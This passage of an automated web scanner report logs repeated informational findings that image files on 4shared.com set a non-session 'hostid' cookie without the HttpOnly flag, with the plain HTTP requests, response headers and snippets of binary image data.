Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/icons/flags/nl.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-572108; Expires=Mon, 26-Jul-2021 14:00:02 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/nl.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:02 GMT; Path=/
Set-Cookie: hostid=-572108; Expires=Mon, 26-Jul-2021 14:00:02 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:02 GMT
ETag: W/"360-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 360
Date: Fri, 29 Jul 2011 14:00:01 GMT

GIF89a.........t...4n..!..bs.X.................z.Z...]kE{.:r.*f....d...BQ.Td.u...G.z...Y...!`.Bw.Q.K...<P..T../j.....<M.......jz.1B.7G>v..LZ.Vj.Zn..1.Wh.Ygw......j..,<....P_...m~.HW....p...........
...[SNIP]...

6.112. http://www.4shared.com/images/icons/flags/no.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/icons/flags/no.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-804005107; Expires=Mon, 26-Jul-2021 14:00:03 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/no.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:03 GMT; Path=/
Set-Cookie: hostid=-804005107; Expires=Mon, 26-Jul-2021 14:00:03 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:03 GMT
ETag: W/"376-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 376
Date: Fri, 29 Jul 2011 14:00:03 GMT

GIF89a..........e......da....mk.|z....V.....1/z.........-+.MK.^\..........TR....DC....EC.LJk.....o...'$.?=.:7.IG.52.!........41w......75W..]...ZW....;9.PN.IF.hfN....,.a_.@=.rq...~..s...)&.............
...[SNIP]...

6.113. http://www.4shared.com/images/icons/misc/ok.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/icons/misc/ok.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=1998746579; Expires=Mon, 26-Jul-2021 14:03:02 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/misc/ok.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:03:02 GMT; Path=/
Set-Cookie: hostid=1998746579; Expires=Mon, 26-Jul-2021 14:03:02 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:03:02 GMT
ETag: W/"510-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 510
Date: Fri, 29 Jul 2011 14:03:01 GMT

GIF89a.....@.t..t..~.._..)../{/].._..x..v...z.}..>.>Z..).)Y..x..{....I^...|.g.g.i.s.%e.ev....)...u..{....NO.O!..7.4w..w..$z.K..u..!.!%.%!z._._...w..m.(Z..V.VO.Of..D.D_..#y.}..J.I..Y_..*..'|.c.h....Qx
...[SNIP]...

6.114. http://www.4shared.com/images/images/icossl.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/images/icossl.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-1635750364; Expires=Mon, 26-Jul-2021 14:02:40 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/images/icossl.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:02:40 GMT; Path=/
Set-Cookie: hostid=-1635750364; Expires=Mon, 26-Jul-2021 14:02:40 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:02:40 GMT
ETag: W/"793-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 793
Date: Fri, 29 Jul 2011 14:02:40 GMT

GIF89aA......... ~....*........0...j.&.....p.....r.`..P.....@...{..y.......J..Q.....i........0..~..a..........................).................H..'.....N...l..o.?........?........4..H..`........3...
...[SNIP]...

6.115. http://www.4shared.com/images/index-premium-features.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/index-premium-features.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=2020542788; Expires=Mon, 26-Jul-2021 13:59:25 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/index-premium-features.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:25 GMT; Path=/
Set-Cookie: hostid=2020542788; Expires=Mon, 26-Jul-2021 13:59:25 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:25 GMT
ETag: W/"3727-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/png
Content-Length: 3727
Date: Fri, 29 Jul 2011 13:59:24 GMT

.PNG
.
...IHDR.......$......Q((....tEXtSoftware.Adobe ImageReadyq.e<...1IDATx..]yl......z./.c...9.MB.....T..&.S....B+.QST.6.)..&.HE...z....
)..B..C. ..1.pbl.cl....z....o<;.;;.^{wA..h5........{...z.
...[SNIP]...

6.116. http://www.4shared.com/images/logo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=1860872067; Expires=Mon, 26-Jul-2021 13:59:41 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/logo.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:41 GMT; Path=/
Set-Cookie: hostid=1860872067; Expires=Mon, 26-Jul-2021 13:59:41 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:41 GMT
ETag: W/"3348-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 3348
Date: Fri, 29 Jul 2011 13:59:41 GMT

GIF89aF.,............mnpxx{dfi{|...zz}QRU......rruWX\...bdf...wx{...ppsnnqTUYklo.........WX[......}~.~~.MNQ...............jjn...||VWZ...ghk\]`...ttw...ghjijm...`bevvyXZ]......cdg[\`.........tvy....
...[SNIP]...

6.117. http://www.4shared.com/images/logol.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/logol.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=134585241; Expires=Mon, 26-Jul-2021 14:07:53 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/logol.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:53 GMT; Path=/
Set-Cookie: hostid=134585241; Expires=Mon, 26-Jul-2021 14:07:53 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:53 GMT
ETag: W/"4861-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 4861
Date: Fri, 29 Jul 2011 14:07:53 GMT

GIF89aU.A..........tuxyz}dehstwnor...klomnqijmvwzrsv...~.ppscdgwx{LMQxy|...TUX|}.efiz{~jkn}~.ghkxxzops...~~....rruVW[lmp...abfVWZuvyrrvqru......bcfabdQRV{|~nnpRSVghl\]`lln......_`bopt||~WX\...`adzz|.
...[SNIP]...

6.118. http://www.4shared.com/images/menu.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/menu.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=18766071; Expires=Mon, 26-Jul-2021 14:08:05 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/menu.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:05 GMT; Path=/
Set-Cookie: hostid=18766071; Expires=Mon, 26-Jul-2021 14:08:05 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:05 GMT
ETag: W/"1657-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 1657
Date: Fri, 29 Jul 2011 14:08:04 GMT

GIF89a.........qqq.....................................................................................................................................................................................
...[SNIP]...

6.119. http://www.4shared.com/images/menuOver.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/menuOver.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=243671667; Expires=Mon, 26-Jul-2021 14:08:20 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/menuOver.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:20 GMT; Path=/
Set-Cookie: hostid=243671667; Expires=Mon, 26-Jul-2021 14:08:20 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:20 GMT
ETag: W/"2019-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 2019
Date: Fri, 29 Jul 2011 14:08:19 GMT

GIF89a..........qqq....................................................................................................................................................................................
...[SNIP]...

6.120. http://www.4shared.com/images/menuSel.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/menuSel.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=194628574; Expires=Mon, 26-Jul-2021 14:09:54 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/menuSel.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:09:54 GMT; Path=/
Set-Cookie: hostid=194628574; Expires=Mon, 26-Jul-2021 14:09:54 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:09:54 GMT
ETag: W/"2085-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 2085
Date: Fri, 29 Jul 2011 14:09:54 GMT

GIF89a.......qqq.......................................................................................................................................................................................
...[SNIP]...

6.121. http://www.4shared.com/images/menutabs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/menutabs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-2111948687; Expires=Mon, 26-Jul-2021 14:09:58 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/menutabs.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:09:58 GMT; Path=/
Set-Cookie: hostid=-2111948687; Expires=Mon, 26-Jul-2021 14:09:58 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:09:58 GMT
ETag: W/"5512-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 5512
Date: Fri, 29 Jul 2011 14:09:57 GMT

GIF89a..d.........qqq..................................................................................................................................................................................
...[SNIP]...

6.122. http://www.4shared.com/images/mobile/nokia_e51_thumb.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/mobile/nokia_e51_thumb.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=622488398; Expires=Mon, 26-Jul-2021 14:00:23 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/mobile/nokia_e51_thumb.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:23 GMT; Path=/
Set-Cookie: hostid=622488398; Expires=Mon, 26-Jul-2021 14:00:23 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:23 GMT
ETag: W/"3648-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/png
Content-Length: 3648
Date: Fri, 29 Jul 2011 14:00:23 GMT

.PNG
.
...IHDR...F...F.....q.......tEXtSoftware.Adobe ImageReadyq.e<...IDATx..\kl.W..........q.v..qB.8mpS......%T
( P[... ...D......HTUK.VB.Di..M..Fm..&i....o..........p.].I....V....;;/.~s...s...l.
...[SNIP]...

6.123. http://www.4shared.com/images/mobile/nokia_e63_thumb.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/mobile/nokia_e63_thumb.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-549637998; Expires=Mon, 26-Jul-2021 14:00:23 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/mobile/nokia_e63_thumb.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:23 GMT; Path=/
Set-Cookie: hostid=-549637998; Expires=Mon, 26-Jul-2021 14:00:23 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:23 GMT
ETag: W/"4760-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/png
Content-Length: 4760
Date: Fri, 29 Jul 2011 14:00:23 GMT

.PNG
.
...IHDR...F...F.....q.......tEXtSoftware.Adobe ImageReadyq.e<...:IDATx..\i.\.u.....z....U3#....hAh4.,..9..@H
....`6.2f5...\..I...r."P.S..e.#(.....".>...}.......so.H#.HJ.*..]U.{......=.;.9.>.
...[SNIP]...

6.124. http://www.4shared.com/images/mobile/nokia_e66_thumb.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/mobile/nokia_e66_thumb.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=92561674; Expires=Mon, 26-Jul-2021 14:00:24 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/mobile/nokia_e66_thumb.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:24 GMT; Path=/
Set-Cookie: hostid=92561674; Expires=Mon, 26-Jul-2021 14:00:24 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:24 GMT
ETag: W/"3729-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/png
Content-Length: 3729
Date: Fri, 29 Jul 2011 14:00:23 GMT

.PNG
.
...IHDR...F...F.....q.......tEXtSoftware.Adobe ImageReadyq.e<...3IDATx..\{lT.....3.......xl..@...M1u.H@..H.....ZUQ...n.J}H+.....VUw..T..Rmv.d..m7...$.(. @.<.)Ocp...y.}..s.....H.u......;w...w
...[SNIP]...

6.125. http://www.4shared.com/images/mobile/nokia_e71_thumb.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/mobile/nokia_e71_thumb.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=794225068; Expires=Mon, 26-Jul-2021 14:00:26 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/mobile/nokia_e71_thumb.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:26 GMT; Path=/
Set-Cookie: hostid=794225068; Expires=Mon, 26-Jul-2021 14:00:26 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:26 GMT
ETag: W/"4399-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/png
Content-Length: 4399
Date: Fri, 29 Jul 2011 14:00:25 GMT

.PNG
.
...IHDR...F...F.....q.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..[il\.u..{........HI.(..)..hG ....6uQ...&H..).....1Z.I.8.....6h.8.a$.....[.....E....I......r..M.9.TI.RlT)f.>a.7......9..
...[SNIP]...

6.126. http://www.4shared.com/images/mobile/nokia_e72_thumb.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/mobile/nokia_e72_thumb.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-1497623547; Expires=Mon, 26-Jul-2021 14:00:26 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/mobile/nokia_e72_thumb.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:26 GMT; Path=/
Set-Cookie: hostid=-1497623547; Expires=Mon, 26-Jul-2021 14:00:26 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:26 GMT
ETag: W/"4543-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/png
Content-Length: 4543
Date: Fri, 29 Jul 2011 14:00:25 GMT

.PNG
.
...IHDR...F...F.....q.......tEXtSoftware.Adobe ImageReadyq.e<...aIDATx..\ytT.u..eV....:...;.r.... N...q|../..mJ....M\..M..&iOR7i{.....M...r.lL...`.!..H..vi4...y..~......s....;3...7.~........
...[SNIP]...

6.127. http://www.4shared.com/images/mobile/screens/4mS_1.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/mobile/screens/4mS_1.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=1643169800; Expires=Mon, 26-Jul-2021 14:00:20 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/mobile/screens/4mS_1.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:20 GMT; Path=/
Set-Cookie: hostid=1643169800; Expires=Mon, 26-Jul-2021 14:00:20 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:20 GMT
ETag: W/"9084-1305634980000"
Last-Modified: Tue, 17 May 2011 12:23:00 GMT
Content-Type: image/jpeg
Content-Length: 9084
Date: Fri, 29 Jul 2011 14:00:19 GMT

......JFIF.....d.d......Ducky.......<.....&Adobe.d...........
..
........R..#z............... ... .......

.

.......................................................................................
...[SNIP]...

6.128. http://www.4shared.com/images/mobile/screens/4mS_2.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/mobile/screens/4mS_2.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=870060581; Expires=Mon, 26-Jul-2021 14:00:20 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/mobile/screens/4mS_2.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:20 GMT; Path=/
Set-Cookie: hostid=870060581; Expires=Mon, 26-Jul-2021 14:00:20 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:20 GMT
ETag: W/"12561-1305634980000"
Last-Modified: Tue, 17 May 2011 12:23:00 GMT
Content-Type: image/jpeg
Content-Length: 12561
Date: Fri, 29 Jul 2011 14:00:19 GMT

......JFIF.....d.d......Ducky.......<.....&Adobe.d...........
..
......."...1................ ... .......

.

.......................................................................................
...[SNIP]...

6.129. http://www.4shared.com/images/mobile/screens/4mS_3.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/mobile/screens/4mS_3.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-480347017; Expires=Mon, 26-Jul-2021 14:00:20 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/mobile/screens/4mS_3.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
